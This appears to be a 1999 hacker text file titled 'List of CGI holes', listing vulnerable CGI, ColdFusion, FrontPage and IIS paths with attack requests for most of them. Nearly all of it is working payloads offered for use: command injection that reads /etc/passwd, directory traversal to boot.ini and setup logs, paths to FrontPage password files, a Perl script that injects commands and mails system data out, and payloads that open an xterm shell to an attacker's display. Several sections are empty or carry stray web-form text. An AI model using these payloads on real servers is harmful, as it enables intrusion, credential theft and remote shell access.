°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤°º¤ø,¸¸,ø¤º°°°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,°
° °
° °
° List of CGI holes °
° °
° °
°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤°º¤ø,¸¸,ø¤º°°°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,°
written by putois, October 99
Index:
bugs cgi
________
/cgi-bin/AT-generate.cgi
/cgi-bin/anyform.cgi
/cgi-bin/aglimpse
/cgi-bin/bnbform.cgi
/cgi-bin/campas
/cgi-bin/carbo
/cgi-bin/cgimail
/cgi-bin/classifieds.cgi
/cgi-bin/count.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/environ.cgi
/cgi-bin/file.pl
/cgi-bin/faxsurvey.cgi
/cgi-bin/formail
/cgi-bin/guestbook
/cgi-bin/handler
/cgi-bin/httpd
/cgi-bin/htmlscript
/cgi-bin/info2www
/cgi-bin/nph-test.cgi
/cgi-bin/nph-publish
/cgi-bin/perl.exe
/cgi-bin/pfdispaly.cgi
/cgi-bin/php
/cgi-bin/phf
/cgi-bin/Quid Pro Quo (mac os)
/cgi-bin/s97_cgi
/cgi-bin/survey.cgi
/cgi-bin/start
/cgi-bin/textcounter
/cgi-bin/uploader.exe
/cgi-bin/view-source
/cgi-bin/webdist
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/websites
/cgi-bin/webstart
/cgi-bin/whois_raw.cgi
/cgi-bin/wwwboard
/cgi-bin/www-msql
cold fusion
___________
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/kdg.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
websql
______
sql
front page
__________
/_vti_bin/shtml.dll
_private/download.log
_vti_pvt/users.pwd (FrontPage user password file)
_vti_pvt/administrators.pwd (FrontPage administrator password file)
iisadmin
________
/scripts/iisadmin/
AT-generate.cgi
_______________
exploit
anyform.cgi
___________
aglimpse (telnet 80)
________
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5hack\@i.am\
FIELDS MARKED WITH * ARE REQUIRED!
Your Name:*
campas (telnet 80)
______
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
carbo
_____
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog
cgimail.exe (nt)
________________
count.cgi
_________
http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../path/file.gif
dumpenv.pl
__________
http://www.site.net/cgi-bin/dumpenv.pl?/session/adminlogin?RCpage=/sysadmin/index.stm
http://www.site.net/c:/program files/sambar41
environ.cgi (telnet 80)
___________
/cgi-bin/environ.cgi HTTP/1.1" 200 2034
file.pl
_______
http://netware.nmrc.org/perl/files.pl?file=sys:system/autoexec.ncf
http://netware.nmrc.org/perl/files.pl?file=sys:etc/ldremote.ncf
http://netware.nmrc.org/perl/files.pl?file=vol2:apps/accounting/payroll.doc
faxsurvey
_________
http://linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
FormMail
________
hack
guestbook
_________
/cgi-bin/wguest.exe?template=3dc:\boot.ini
/cgi-bin/rguest.exe?template=3dc:\winnt\system32\$winnt$.inf
handler (telnet 80)
_______
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0
-> press the Tab key after cat
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
/cgi-bin/handler/whatever;cat\t/etc/passwd\|\t
GET /cgi-bin/handler/ ;/usr/sbin/xwsh -display enemy:0|?data=Download
GET /cgi-bin/handler/ ;cat /etc/passwd|?data=Download
htmlscript
__________
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
httpd (telnet 80)
_____
GET / HTTP/1.0" 404 -9999999 "
info2www
________
REQUEST_METHOD=GET ./info2www '(../../../../bin/mail user_name
Male
Female
Neuter
start
_____
/cgi-bin/start?curmbox=ACTIVE&js=no&login
textcounter
___________
#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root'; # please _modify_ this
if ($ARGV[0]) {
$CMD=$ARGV[0];
}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
}
$text="${URL}/;IFS=\8;${CMD};echo|";
$text =~ s/ /\$\{IFS\}/g;
system({"lynx"} "lynx", $text);
system({"lynx"} "lynx", $text);
uploader.exe
____________
view-source
___________
http://hack.com/cgi-bin/view-source?../../../../../../../etc/passwd'
webdist
_______
http://host.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
http://host/cgi-bin/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh
* also applies to: wrap.cgi, handler.cgi, day5datacopier.cgi, day5notifier.cgi
http://victim/cgi-bin/wrap/blah;/tmp/myscript
http://sgi.victim/cgi-bin/wrap?/../../../../../etc
webgais
_______
telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 80 (replace this with the actual length of
the "exploit" line)
query=';mail+you\@your.host
whois_raw
_________
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
www-msql
________
http://www.thegnome.com/secure/.htaccess
http://www.thegnome.com/secure/.wwwacl
http://your.server/cgi-bin/www-sql/protected/something.html
Cold fusion
___________
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt
http://www.server.com/cfdocs/expeval/kdg.cfm?DirPath=C%3A%5Cinetpub%5Cwwwroot%5C
http://www.server.com//cfdocs/expeval/sendmail.cfm?MailFrom=&MailTo=&Subject=&Message=
http://server/cfdocs/snippets/fileexists.cfm?..\..\..\..\boot.ini
http://server/cfdocs/snippets/gettempdirectory.cfm
http://server/cfdocs/snippets/viewexample.cfm?Tagname=..\..\
front page
__________